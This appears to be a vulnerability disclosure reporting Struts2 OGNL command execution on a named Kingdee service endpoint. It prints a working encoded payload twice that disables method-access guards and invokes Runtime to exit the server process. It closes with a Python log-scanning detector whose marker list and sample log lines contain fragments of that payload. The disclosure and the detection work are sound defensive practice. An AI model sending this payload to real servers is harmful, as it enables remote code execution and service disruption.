Command execution on a Kingdee channel

Published: 2025-04-13
Revised: 2025-04-13

### Brief description:

Command execution on a Kingdee channel.

### Details:

Remote execution vulnerability in the Struts2 framework.

```
http://service.kingdee.com/wish/gotoWish.action
```

```
http://service.kingdee.com/wish/gotoWish.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%281%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1
```

### Proof of vulnerability:

```
http://service.kingdee.com/wish/gotoWish.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%281%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1
```
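
The request shown above places its expressions in the query parameter names and writes `#` and `=` as `\u0023` and `\u003d`. The following detection sketch is an added example, not part of the original report: it decodes parameter names from access-log lines and flags the strings that appear in that request. The log lines are constructed, and it assumes the log stores the request target unmodified.

```python
import re
from urllib.parse import unquote

# Strings that appear in the parameter names of the request shown on this page.
OGNL_MARKERS = (
    "#_memberAccess",
    "allowStaticMethodAccess",
    "#context",
    "xwork.MethodAccessor.denyMethodExecution",
    "@java.lang.Runtime@getRuntime",
)
UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def expand_escapes(text):
    """Turn \\uXXXX sequences into the characters they stand for (\\u0023 -> #)."""
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def markers_in_param_names(target):
    """Return the markers found in the query parameter NAMES of a request target."""
    found = []
    for pair in target.partition("?")[2].split("&"):
        # Split on the literal '=' first: the payload hides its own '=' as \u003d.
        name = expand_escapes(unquote(pair.split("=", 1)[0]))
        found += [m for m in OGNL_MARKERS if m in name and m not in found]
    return found


def scan_access_log(lines):
    """Map line number -> markers for every log line with a flagged request."""
    alerts = {}
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        hits = markers_in_param_names(match.group(1)) if match else []
        if hits:
            alerts[number] = hits
    return alerts


# Constructed sample lines (addresses, timestamps and sizes are made up).
SAMPLE_LOG = [
    r'203.0.113.7 - - [13/Apr/2025:10:00:00 +0800] "GET /wish/gotoWish.action?id=42&page=2 HTTP/1.1" 200 512',
    r'203.0.113.9 - - [13/Apr/2025:10:00:05 +0800] "GET /wish/gotoWish.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true HTTP/1.1" 200 0',
    r'203.0.113.7 - - [13/Apr/2025:10:00:09 +0800] "GET /wish/gotoWish.action?q=allowStaticMethodAccess HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for number, hits in scan_access_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(hits)}")
```

The third sample line is not flagged because the marker sits in a parameter value rather than a name.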
